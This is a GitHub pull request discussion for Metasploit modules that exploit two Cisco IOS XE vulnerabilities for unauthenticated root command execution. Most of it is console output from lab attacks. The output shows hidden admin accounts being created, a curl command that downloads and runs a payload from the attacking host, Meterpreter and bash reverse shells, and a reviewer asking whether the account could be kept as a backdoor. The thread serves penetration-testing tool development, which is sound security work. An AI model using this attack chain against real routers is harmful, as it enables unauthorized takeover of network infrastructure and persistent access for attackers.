Exploit & Auxiliary modules for CVE-2023-20198 and CVE-2023-20273 (Cisco IOS XE) #18507

Merged
merged 13 commits into from
Nov 8, 2023

Conversation

@sfewer-r7 (Contributor) commented Nov 3, 2023

This pull request adds two auxiliary modules for the recent Cisco IOS XE vulnerabilities that have been exploited in the wild.

The module auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 leverages CVE-2023-20198 to perform unauthenticated remote CLI command execution. Horizon3ai have a two-part writeup with technical details on the vuln.

The module auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273 leverages both CVE-2023-20198 and CVE-2023-20273 to perform unauthenticated remote OS command execution. Leakix has a writeup with technical details on the second CVE. The reason this module is an aux module and not an exploit module is that, even though we get OS command execution, the OS seems to be hardened and running a Metasploit payload is non-trivial (at least from some early testing on the device I have). I am investigating this further.

Example Usage (CVE-2023-20198)

msf6 > use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set RHOST 192.168.86.57
RHOST => 192.168.86.57
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set CMD "exit\\nshow version"
CMD => exit\nshow version
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run
[*] Running module against 192.168.86.57


Cisco IOS XE Software, Version 16.12.03
Cisco IOS Software [Gibraltar], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 16.12.3, RELEASE SOFTWARE (fc5)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2020 by Cisco Systems, Inc.
Compiled Mon 09-Mar-20 21:50 by mcpre
...snip...

Example Usage (CVE-2023-20198 + CVE-2023-20273)

msf6 > use auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set RHOST 192.168.86.57
RHOST => 192.168.86.57
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set CMD "id"
CMD => id
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run
[*] Running module against 192.168.86.57

[*] uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0

[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run CMD="uname -a"
[*] Running module against 192.168.86.57

[*] Linux router 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux

[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > 

…ugs (CVE-2023-20198 and CVE-2023-20273). This allows for unauthenticated remote CLI or OS command execution.
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken SOAP:mustUnderstand="false">
<wsse:Username>#{username}</wsse:Username>
<wsse:Password>*****</wsse:Password>
Contributor

Suggested change
<wsse:Password>*****</wsse:Password>
<wsse:Password>#{Rex::Text.rand_text_alpha(8)}</wsse:Password>

Contributor Author

The string ***** comes from how the Cisco Lua code expects to pass the password, and a comment in the Lua code notes its purpose:

-- Mask the password. It is for audit purposes only and it doesnt use it for authentication
FString  = string.gsub(FString,"#password","*****")

With this in mind I don't think we should change the string to a random alpha text. It makes more sense to leave it as the expected value.

Contributor

Wow, amazing. In a bad way. But still, amazing.


register_options(
[
OptString.new('CMD', [ true, 'The Global configuration CLI command to execute. To drop to Privileged EXEC mode, preface your CMD with exit\\\\n, e.g "exit\\\\nshow version"', 'exit\\nshow version'])
Contributor

I think it'd be easier for users to have a "PrivilegedExec" boolean instead of having to manually add a prefix, wouldn't it?

Contributor Author

Yes, this is a good idea. I have implemented this via b286687.

sfewer-r7 and others added 4 commits November 6, 2023 09:47
Co-authored-by: Julien Voisin <[email protected]>
…. If set these admin creds are used to leverage CVE-2023-20273. If not set, then CVE-2023-20198 is used to create a new temp admin account before leveraging CVE-2023-20273
@sfewer-r7 sfewer-r7 marked this pull request as draft November 6, 2023 13:06
@sfewer-r7 (Contributor Author)

Converting this pull request to a draft as I have figured out how to run a payload, so can write an additional exploit module

@bwatters-r7 bwatters-r7 self-assigned this Nov 6, 2023
@sfewer-r7 (Contributor Author)

I have added an RCE exploit module and tested it against IOS XE 17.3.2 and 16.12.3. I added support for both a Linux target (IOS XE is Linux based) and a Unix target, so a broader array of payloads is available (like python meterpreter or a bash shell).

Native Linux Meterpreter (via fetch payloads)

msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'sqVXixoV' with password 'ZiPbsXBu'
[*] Removing user 'sqVXixoV'
[*] Sending stage (3045380 bytes) to 192.168.86.58
[*] Meterpreter session 6 opened (192.168.86.42:4444 -> 192.168.86.58:64970) at 2023-11-06 17:01:06 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : router
OS           :  (Linux 4.19.106)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Unix bash reverse shell

msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'TVtEhbdd' with password 'NtRvujcZ'
[*] Removing user 'TVtEhbdd'
[*] Command shell session 9 opened (192.168.86.42:4444 -> 192.168.86.58:65036) at 2023-11-06 17:04:28 +0000

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux router 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.58 - Command shell session 9 closed.
msf6 exploit(linux/misc/cisco_ios_xe_rce) > 

@sfewer-r7 sfewer-r7 changed the title Aux modules for CVE-2023-20198 and CVE-2023-20273 (Cisco IOS XE) Exploit & Auxiliary modules for CVE-2023-20198 and CVE-2023-20273 (Cisco IOS XE) Nov 6, 2023
@sfewer-r7 sfewer-r7 marked this pull request as ready for review November 6, 2023 17:22
lib/msf/core/exploit/remote/http/cisco_ios_xe.rb (outdated, resolved)
Comment on lines 101 to 103
return false unless res&.code == 200

true
Contributor

Suggested change
return false unless res&.code == 200
true
return res&.code == 200

Contributor Author

Good catch, thanks. Resolved via 7024d4e (the trailing return can be removed also).

# (as the above call to run_cli_command succeeded), however maybe this firmware version uses a different format
# for the version information so our regex wont work.
# Note: Version numbers can have letters in them, e.g. 17.11.99SW or 16.12.1z2
if res =~ /(Cisco IOS XE Software, Version [\d\S]+\.[\d\S]+\.[\d\S]+)/
Contributor

Suggested change
if res =~ /(Cisco IOS XE Software, Version [\d\S]+\.[\d\S]+\.[\d\S]+)/
if res =~ /(Cisco IOS XE Software, Version [^.]+\.[^.]+\.[\^.]+)/

@sfewer-r7 (Contributor Author) Nov 7, 2023

Thanks Julien. Looking at the current expression, the \d is redundant so I think /(Cisco IOS XE Software, Version \S+\.\S+\.\S+)/ is probably the best expression. Using ^\. will also include whitespace chars which I was trying to avoid.

I have removed the redundant \d via 2a56c3f.

Testing (Cisco IOS XE Software, Version \S+\.\S+\.\S+):

[screenshot of the regex test]

Testing (Cisco IOS XE Software, Version [^\.]+\.[^\.]+\.[^\.]+):

[screenshot of the regex test]
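The regex difference discussed above, as an added Ruby example (not code from the PR or from Metasploit) run against constructed 'show version' banner text; the constants and helper names below (BANNER_1612, version_number, spills_across_lines?) are this example's own, and the reviewer's suggested class is written as [^.] since [\^.] in the suggestion is a typo:

```ruby
# Added example: compares the author's final version regex with the reviewer's
# negated-class suggestion on constructed banner text. Not part of the PR.

# Author's expression ([\d\S]+ is equivalent to \S+, since \S already covers \d).
VERSION_RE_NON_SPACE = /(Cisco IOS XE Software, Version \S+\.\S+\.\S+)/
# Reviewer's suggestion: anything but a dot. A negated class also matches
# spaces and newlines, which is the problem the author points out.
VERSION_RE_NON_DOT   = /(Cisco IOS XE Software, Version [^.]+\.[^.]+\.[^.]+)/

# Constructed banner; the first two lines follow the format quoted in this PR.
BANNER_1612 = "Cisco IOS XE Software, Version 16.12.03\n" \
              "Cisco IOS Software [Gibraltar], Virtual XE Software " \
              "(X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 16.12.3, RELEASE SOFTWARE (fc5)\n" \
              "Technical Support: http://www.cisco.com/techsupport\n"

# Constructed banners with letters in the version, as the PR comment notes.
BANNER_SW = "Cisco IOS XE Software, Version 17.11.99SW\nSome other line.\n"
BANNER_Z2 = "Cisco IOS XE Software, Version 16.12.1z2\nSome other line.\n"

# Returns the captured version line, or nil when the banner format is unknown
# (the module's reason for the comment about other firmware formats).
def extract_version_line(banner, re = VERSION_RE_NON_SPACE)
  m = banner.match(re)
  m && m[1]
end

# Returns only the version token, e.g. "17.11.99SW", or nil.
def version_number(banner, re = VERSION_RE_NON_SPACE)
  line = extract_version_line(banner, re)
  line && line.sub('Cisco IOS XE Software, Version ', '')
end

# True when the capture spills past the end of the version line: with [^.]
# the third group keeps consuming newlines and text until the next '.'
# anywhere later in the banner.
def spills_across_lines?(banner, re)
  line = extract_version_line(banner, re)
  !line.nil? && line.include?("\n")
end

if __FILE__ == $PROGRAM_NAME
  puts version_number(BANNER_1612)                            # 16.12.03
  puts version_number(BANNER_SW)                              # 17.11.99SW
  puts spills_across_lines?(BANNER_1612, VERSION_RE_NON_DOT)  # true
  puts spills_across_lines?(BANNER_1612, VERSION_RE_NON_SPACE) # false
end
```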

@bwatters-r7 (Contributor)

msf6 > use exploit/linux/misc/cisco_ios_xe_rce 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options

Module options (exploit/linux/misc/cisco_ios_xe_rce):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
   CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have
                                                 been tested to work.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/u
                                                 sing-metasploit.html
   RPORT              443              yes       The target port (TCP)
   SSL                true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                               no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      jWSTEaIE         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/misc/cisco_ios_xe_rce) > set rhosts 10.5.135.193
rhosts => 10.5.135.193
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set verbose true
verbose => true
msf6 exploit(linux/misc/cisco_ios_xe_rce) > run

[*] Command to run on remote host: curl -so ./WlKtFuAjkfed http://10.5.135.201:8080/v3vZxR3P-stuKWjUe6pCeA; chmod +x ./WlKtFuAjkfed; ./WlKtFuAjkfed &
[*] Fetch Handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /v3vZxR3P-stuKWjUe6pCeA
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'IaAALVeV' with password 'FUaIMIRs'
[*] Sleeping for 2 seconds before attempting again
[*] Removing user 'IaAALVeV'
[*] Client 10.5.135.193 requested /v3vZxR3P-stuKWjUe6pCeA
[*] Sending payload to 10.5.135.193 (curl/7.57.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 10.5.135.193
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.135.193:64720) at 2023-11-07 11:53:00 -0600

meterpreter > sysinfo
Computer     : Router
OS           :  (Linux 4.19.64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 

@bwatters-r7 (Contributor) left a comment

Just a quick question and I noticed that the docs might not have been updated after a change to the module.

ensure
vprint_status("Removing user '#{admin_username}'")

unless run_cli_command("no username #{admin_username}", Mode::GLOBAL_CONFIGURATION)
Contributor

Would it ever be worthwhile to leave the user as a backdoor?

Contributor Author

Perhaps. I think, as the aux module cisco_ios_xe_cli_exec_cve_2023_20198 would allow the creation of a new admin account via a CLI command, that is also an option.

@bwatters-r7 (Contributor)

msf6 exploit(linux/misc/cisco_ios_xe_rce) > use auxiliary/admin/http/cisco_ios_xe_
use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198  use auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273
msf6 exploit(linux/misc/cisco_ios_xe_rce) > use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > show options

Module options (auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      show version     yes       The CLI command to execute.
   MODE     privileged       yes       The mode to execute the CLI command in, valid values are 'user', 'privileged', or 'global'.
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metas
                                       ploit.html
   RPORT    443              yes       The target port (TCP)
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set rhost 10.5.135.193
rhost => 10.5.135.193
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set verbose true
verbose => true
msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run
[*] Running module against 10.5.135.193


Cisco IOS XE Software, Version 16.12.03
Cisco IOS Software [Gibraltar], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 16.12.3, RELEASE SOFTWARE (fc5)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2020 by Cisco Systems, Inc.
Compiled Mon 09-Mar-20 21:50 by mcpre
Cisco IOS-XE software, Copyright (c) 2005-2020 by cisco Systems, Inc.
All rights reserved.  Certain components of Cisco IOS-XE software are
licensed under the GNU General Public License ("GPL") Version 2.0.  The
software code licensed under GPL Version 2.0 is free software that comes
with ABSOLUTELY NO WARRANTY.  You can redistribute and/or modify such
GPL code under the terms of GPL Version 2.0.  For more details, see the
documentation or "License Notice" file accompanying the IOS-XE software,
or the applicable URL provided on the flyer accompanying the IOS-XE
software.
ROM: IOS-XE ROMMON
Router uptime is 2 hours, 43 minutes
Uptime for this control processor is 2 hours, 44 minutes
System returned to ROM by reload
System image file is "bootflash:packages.conf"
Last reload reason: reload
This product contains cryptographic features and is subject to United
States and local country laws governing import, export, transfer and
use. Delivery of Cisco cryptographic products does not imply
third-party authority to import, export, distribute or use encryption.
Importers, exporters, distributors and users are responsible for
compliance with U.S. and local country laws. By using this product you
agree to comply with applicable laws and regulations. If you are unable
to comply with U.S. and local laws, return this product immediately.
A summary of U.S. laws governing Cisco cryptographic products may be found at:
http://www.cisco.com/wwl/export/crypto/tool/stqrg.html
If you require further assistance please contact us by sending email to
[email protected].
License Level: ax
License Type: N/A(Smart License Enabled)
Next reload license Level: ax
Smart Licensing Status: UNREGISTERED/No Licenses in Use
cisco CSR1000V (VXE) processor (revision VXE) with 1113574K/3075K bytes of memory.
Processor board ID 90MA5Z72JQX
2 Gigabit Ethernet interfaces
32768K bytes of non-volatile configuration memory.
3012164K bytes of physical memory.
6188032K bytes of virtual hard disk at bootflash:.
0K bytes of WebUI ODM Files at webui:.
Configuration register is 0x2102

[*] Auxiliary module execution completed

msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > show options

Module options (auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273):

   Name                   Current Setting  Required  Description
   ----                   ---------------  --------  -----------
   CISCO_ADMIN_PASSWORD                    no        The password of an admin account. If not set, CVE-2023-20198 is leveraged to c
                                                     reate a new admin password.
   CISCO_ADMIN_USERNAME                    no        The username of an admin account. If not set, CVE-2023-20198 is leveraged to c
                                                     reate a new admin account.
   CMD                    id               yes       The OS command to execute.
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   REMOVE_OUTPUT_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to removing the commands
                                                     output file.
   RHOSTS                                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
                                                     cs/using-metasploit.html
   RPORT                  443              yes       The target port (TCP)
   SSL                    true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                                   no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set rhosts 10.5.135.193
rhosts => 10.5.135.193
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > set verbose true
verbose => true
msf6 auxiliary(admin/http/cisco_ios_xe_os_exec_cve_2023_20273) > run
[*] Running module against 10.5.135.193

[*] Created privilege 15 user 'rfojGrqA' with password 'ixnXyFlw'
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0

[*] Removing output file '/var/www/fNrmuBOf'
[*] Removing user 'rfojGrqA'
[*] Auxiliary module execution completed

…O_ADMINUSERNAME and CISCO_ADMIN_PASSWORD in the show options command output

Co-authored-by: Brendan <[email protected]>
@bwatters-r7 bwatters-r7 merged commit 77a93e4 into rapid7:master Nov 8, 2023
55 checks passed
@bwatters-r7 (Contributor)

Release Notes

This PR adds three modules: auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 leverages CVE-2023-20198 to perform unauthenticated remote CLI command execution, module auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273 leverages both CVE-2023-20198 and CVE-2023-20273 to perform unauthenticated remote OS command execution, and exploit/linux/misc/cisco_ios_xe_rce uses the same two vulnerabilities to run an arbitrary payload on the target.

@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Nov 10, 2023
@sfewer-r7 sfewer-r7 deleted the cisco-ios-xe-vulns branch July 4, 2024 08:59